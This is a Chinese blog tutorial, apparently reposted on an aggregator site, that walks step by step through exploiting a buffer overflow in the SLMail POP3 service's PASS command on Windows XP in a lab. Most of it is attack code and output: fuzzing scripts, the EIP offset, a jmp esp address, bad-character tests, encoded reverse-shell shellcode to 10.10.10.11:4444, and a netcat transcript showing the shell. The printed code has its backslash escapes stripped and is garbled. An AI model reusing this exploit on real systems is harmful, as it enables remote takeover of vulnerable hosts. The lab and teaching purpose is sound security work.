windows缓冲区溢出
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了windows缓冲区溢出相关的知识,希望对你有一定的参考价值。
写的不好多加指教
准备环境:
攻机:Kali 2.0
靶机:windows xp ,windows2003不能做这个实验,亲测好多次没成功。有兴趣可以试试
软件:SLMail、immunity debugger 、mona.py
需要软件的可以留言。
总体步骤:
1. 测试是否发生缓冲区溢出
2. 找到缓冲区溢出的位置的临界点并验证
3. 查找系统中固定分配的模块中,哪里有jmp esp,为了后面实现跳转
4. 在2找到的位置处写上3处找到的地址,也就是实现由 eip 到 jmp esp 的过程。这个过程设置断点验证是否跳转成功
5. 判断有哪些坏字符,每个服务不一定相同
6. 生成shellcode,并发送。
7. 完成
Step 1. 利用python脚本测试连接windows的POP3
开启windows的POP3服务
使用python脚本测试来连接
?#!/usr/bin/python
?import socket
?s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
?try:
? print "
Sending veil buffer..."
? s.connect((‘10.10.10.19‘,110))
? data=s.recv(1024)
? print data
? s.send(‘USER test
‘)
? data=s.recv(1024)
? print data
? s.send(‘PASS test
‘)
? data=s.recv(1024)
? print data
? s.close()
? print "
Done!"
?except:
? print "
Failed to connect pop3"
运行结果:
[email protected]:/test# ./01.py
?Sending veil buffer...
?+OK POP3 server example.com ready <[email protected]>
?-ERR unable to lock mailbox
Done!
说明连接POP3成功.....
Step2. 测试符合是否会发生缓冲区溢出
windows端要用immunity debugger打开slmail服务
打开immunity ==> File ==> Attach ==>选择下面的那一行
点右下角的Attach,然后开始运行,运行时候,右下角的pause会变成running状态
这时运行下面脚本:
#!/usr/bin/python
import socket
buffer = ["A"]
counter = 100
while len(buffer)<=50:
buffer.append("A"*counter)
counter = counter + 200
for string in buffer:
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((‘10.10.10.19‘,110))
print "Sending length %s " %(len(string))
s.recv(1024)
s.send(‘USER test‘+‘
‘)
s.recv(1024)
s.send(‘PASS ‘+string+‘
‘)
s.recv(1024)
s.send(‘QUIT
‘)
s.close()
运行情况:
当执行到2700时。发现在也不动了,看一下windows状况,右下角已经出现了pase,已经停止了,在2600个字符发完之后还能发送,但是到了2700发送完之后就连接不上了,说明缓冲区溢出临界点发生在2600-2700之间。
Step3 确定EIP的位置
利用metasploit生成唯一字符串,发送:
[email protected]:/test# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2700
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8D
重启windows的服务,immunity需要重新打开然后attach,让服务运行起来
修改上面的python继续发送:
#!/usr/bin/python
import socket
buffer="改成上面生成的字符串"
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
print "
Sending veil buffer..."
s.connect((‘10.10.10.19‘,110))
data=s.recv(1024)
s.send(‘USER test
‘)
data=s.recv(1024)
s.send(‘PASS ‘+buffer+‘
‘)
data=s.recv(1024)
s.close()
print "
Done!"
except:
print "
Failed to connect pop3"
运行脚本,观察windows停止时EIP的位置
用metasploit模块求出偏移量:
[email protected]:/test# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 39694438
[*] Exact match at offset 2606
得知偏移量是2606,说明EIP的位置在第2607-2610处
Step 4 验证EIP位置与ESP存放数据长度
重启windows服务,编写下面脚本
#!/usr/bin/python
import socket
buffer = "A"*2606 + "B"*4 + "C"*900
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
print "
Sending veil buffer..."
s.connect((‘10.10.10.19‘,110))
data=s.recv(1024)
s.send(‘USER test
‘)
s.send(‘PASS ‘+ buffer + ‘
‘)
data=s.recv(1024)
s.close()
print "
Done!"
except:
print "
Failed to connect pop3"
服务再次暂停,这时发现EIP处的位置变成4个C,说明确定EIP的位置是正确的。
查看存放C的个数
可以看到下图,计算大概存放了400多个C,足够存放一个shellcode
理想状况就是,将EIP的内容修改成ESP的地址,ESP如果放置的是shellcode此时就会被执行,但是每次ESP的地址不同,不能直接修改。这时,我们需要利用系统中自带的 jmp esp 帮我们跳转到esp位置,去执行shellcode
Step5 查找jmp esp
首先将mona模块导入immunity中的Pycommands中
启动服务,将immunity打开attach上服务。
查看系统的所有模块
需要选择前4个是false的,最后一个是true的。就只有三四个,但是其中只有slmfc.dll模块中含有 jmp esp
其中 xffxe4 是汇编语言中的 jmp esp,可以通过kali工具翻译
[email protected]:~# /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
nasm > jmp esp
00000000 FFE4 jmp esp
输入十六进制需要加上 x 。后面就以第一个作为jmp esp
双击查找的第一个 jmp esp,就可以看到地址是 5F4A358F
Step 6 测试跳转
接着上面的地址设置断点
发送下面的脚本:
#!/usr/bin/python
import socket
buffer = "A"*2606 + "x8fx35x4ax5f" + "C"*900 #倒着输入上面的地址。
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
print "
Sending veil buffer..."
s.connect((‘10.10.10.19‘,110))
data=s.recv(1024)
s.send(‘USER test
‘)
s.send(‘PASS ‘+ buffer + ‘
‘)
data=s.recv(1024)
s.close()
print "
Done!"
except:
print "
Failed to connect pop3"
启动服务,发送脚本
右下角会显示执行到断点处,停止
这时按下F7单步执行
就可以看到,已经跳转到esp,里面装的43 也即是C
说明跳转成功了。
Step 7 判断坏字符
重启服务。
编写下面脚本‘’
#!/usr/bin/python
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
badchar=(
"x01x02x03x04x05x06x07x08x09x0ax0bx0cx0dx0ex0fx10"
"x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1fx20"
"x21x22x23x24x25x26x27x28x29x2ax2bx2cx2dx2ex2fx30"
"x31x32x33x34x35x36x37x38x39x3ax3bx3cx3dx3ex3fx40"
"x41x42x43x44x45x46x47x48x49x4ax4bx4cx4dx4ex4fx50"
"x51x52x53x54x55x56x57x58x59x5ax5bx5cx5dx5ex5fx60"
"x61x62x63x64x65x66x67x68x69x6ax6bx6cx6dx6ex6fx70"
"x71x72x73x74x75x76x77x78x79x7ax7bx7cx7dx7ex7fx80"
"x81x82x83x84x85x86x87x88x89x8ax8bx8cx8dx8ex8fx90"
"x91x92x93x94x95x96x97x98x99x9ax9bx9cx9dx9ex9fxa0"
"xa1xa2xa3xa4xa5xa6xa7xa8xa9xaaxabxacxadxaexafxb0"
"xb1xb2xb3xb4xb5xb6xb7xb8xb9xbaxbbxbcxbdxbexbfxc0"
"xc1xc2xc3xc4xc5xc6xc7xc8xc9xcaxcbxccxcdxcexcfxd0"
"xd1xd2xd3xd4xd5xd6xd7xd8xd9xdaxdbxdcxddxdexdfxe0"
"xe1xe2xe3xe4xe5xe6xe7xe8xe9xeaxebxecxedxeexefxf0"
"xf1xf2xf3xf4xf5xf6xf7xf8xf9xfaxfbxfcxfdxfexffx00"
)
buffer="A"*2606+"B"*4+badchar
try:
s.connect((‘10.10.10.12‘,110))
data=s.recv(1024)
s.send(‘USER test‘+‘
‘)
data=s.recv(1024)
s.send(‘PASS ‘+buffer+‘
‘)
s.close()
print "
Done"
print "
Sending veil buffer..."
except:
print "Fail connect target"
发送脚本,在windows端
通过上图可以看到0x0a的字符缺失,并且之后的字符也有丢失,那么我们改掉0x0a继续发送一遍
可以看到,我们踢掉0a之后,后面字符串就可以显示了,说明0a是个坏字符。x0d也没有显示出来,以及x00
这样就找到三个坏字符0x00 0x0D 0x0A
Step 8 构造shellcode
构造反弹shell
[email protected]:/usr/share/framework2# ./msfpayload win32_reverse LHOST=10.10.10.11 LPORT=4444 R | ./msfencode -b "x0dx00x0a"
[*] Using Msf::Encoder::PexFnstenvMov with final size of 310 bytes
"x6ax48x59xd9xeexd9x74x24xf4x5bx81x73x13x0fx2ax32".
"x60x83xebxfcxe2xf4xf3x40xd9x2dxe7xd3xcdx9fxf0x4a".
"xb9x0cx2bx0exb9x25x33xa1x4ex65x77x2bxddxebx40x32".
"xb9x3fx2fx2bxd9x29x84x1exb9x61xe1x1bxf2xf9xa3xae".
"xf2x14x08xebxf8x6dx0exe8xd9x94x34x7ex16x48x7axcf".
"xb9x3fx2bx2bxd9x06x84x26x79xebx50x36x33x8bx0cx06".
"xb9xe9x63x0ex2ex01xccx1bxe9x04x84x69x02xebx4fx26".
"xb9x10x13x87xb9x20x07x74x5axeex41x24xdex30xf0xfc".
"x54x33x69x42x01x52x67x5dx41x52x50x7excdxb0x67xe1".
"xdfx9cx34x7axcdxb6x50xa3xd7x06x8exc7x3ax62x5ax40".
"x30x9fxdfx42xebx69xfax87x65x9fxd9x79x61x33x5cx69".
"x61x23x5cxd5xe2x08x05x20x38x6bx69x42x23x3cx69x79".
"xbbx81x9ax42xdex99xa5x4ax65x9fxd9x40x22x31x5axd5".
"xe2x06x65x4ex54x08x6cx47x58x30x56x03xfexe9xe8x40".
"x76xe9xedx1bxf2x93xa5xbfxbbx9dxf1x68x1fx9ex4dx06".
"xbfx1ax37x81x99xcbx67x58xccxd3x19xd5x47x48xf0xfc".
"x69x37x5dx7bx63x31x65x2bx63x31x5ax7bxcdxb0x67x87".
"xebx65xc1x79xcdxb6x65xd5xcdx57xf0xfax5ax87x76xec".
"x4bx9fx7ax2excdxb6xf0x5dxcex9fxdfx42xc2xeax0bx75".
"x61x9fxd9xd5xe2x60";
编写脚本:
#!/usr/bin/python
import socket
shellcode="x6ax48x59xd9xeexd9x74x24xf4x5bx81x73x13x0fx2ax32x60x83xebxfcxe2xf4xf3x40xd9x2dxe7xd3xcdx9fxf0x4axb9x0cx2bx0exb9x25x33xa1x4ex65x77x2bxddxebx40x32xb9x3fx2fx2bxd9x29x84x1exb9x61xe1x1bxf2xf9xa3xaexf2x14x08xebxf8x6dx0exe8xd9x94x34x7ex16x48x7axcfxb9x3fx2bx2bxd9x06x84x26x79xebx50x36x33x8bx0cx06xb9xe9x63x0ex2ex01xccx1bxe9x04x84x69x02xebx4fx26xb9x10x13x87xb9x20x07x74x5axeex41x24xdex30xf0xfcx54x33x69x42x01x52x67x5dx41x52x50x7excdxb0x67xe1xdfx9cx34x7axcdxb6x50xa3xd7x06x8exc7x3ax62x5ax40x30x9fxdfx42xebx69xfax87x65x9fxd9x79x61x33x5cx69x61x23x5cxd5xe2x08x05x20x38x6bx69x42x23x3cx69x79xbbx81x9ax42xdex99xa5x4ax65x9fxd9x40x22x31x5axd5xe2x06x65x4ex54x08x6cx47x58x30x56x03xfexe9xe8x40x76xe9xedx1bxf2x93xa5xbfxbbx9dxf1x68x1fx9ex4dx06xbfx1ax37x81x99xcbx67x58xccxd3x19xd5x47x48xf0xfcx69x37x5dx7bx63x31x65x2bx63x31x5ax7bxcdxb0x67x87xebx65xc1x79xcdxb6x65xd5xcdx57xf0xfax5ax87x76xecx4bx9fx7ax2excdxb6xf0x5dxcex9fxdfx42xc2xeax0bx75x61x9fxd9xd5xe2x60"
buffer = "A"*2606 + "x8fx35x4ax5f" + "x90"*9 +shellcode
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
print "
Sending veil buffer..."
s.connect((‘10.10.10.19‘,110))
data=s.recv(1024)
s.send(‘USER test
‘)
s.send(‘PASS ‘+ buffer + ‘
‘)
data=s.recv(1024)
s.close()
print "
Done!"
except:
print "
Failed to connect pop3"
上面的x90 代表NOP,不执行,目的是防止后面的shellcode因为其他原因缺失前面几个字节。
打开windows服务,用kali监听4444端口,然后发送脚本,得到一个反弹shell。
[email protected]:/test# nc -lvp 4444
listening on [any] 4444 ...
^[[A^[[B10.10.10.19: inverse host lookup failed: Unknown host
connect to [10.10.10.11] from (UNKNOWN) [10.10.10.19] 1158
Microsoft Windows XP [?汾 5.1.2600]
(C) ??????? 1985-2001 Microsoft Corp.
C:Program FilesSLmailSystem> #拿到shell
以上是关于windows缓冲区溢出的主要内容,如果未能解决你的问题,请参考以下文章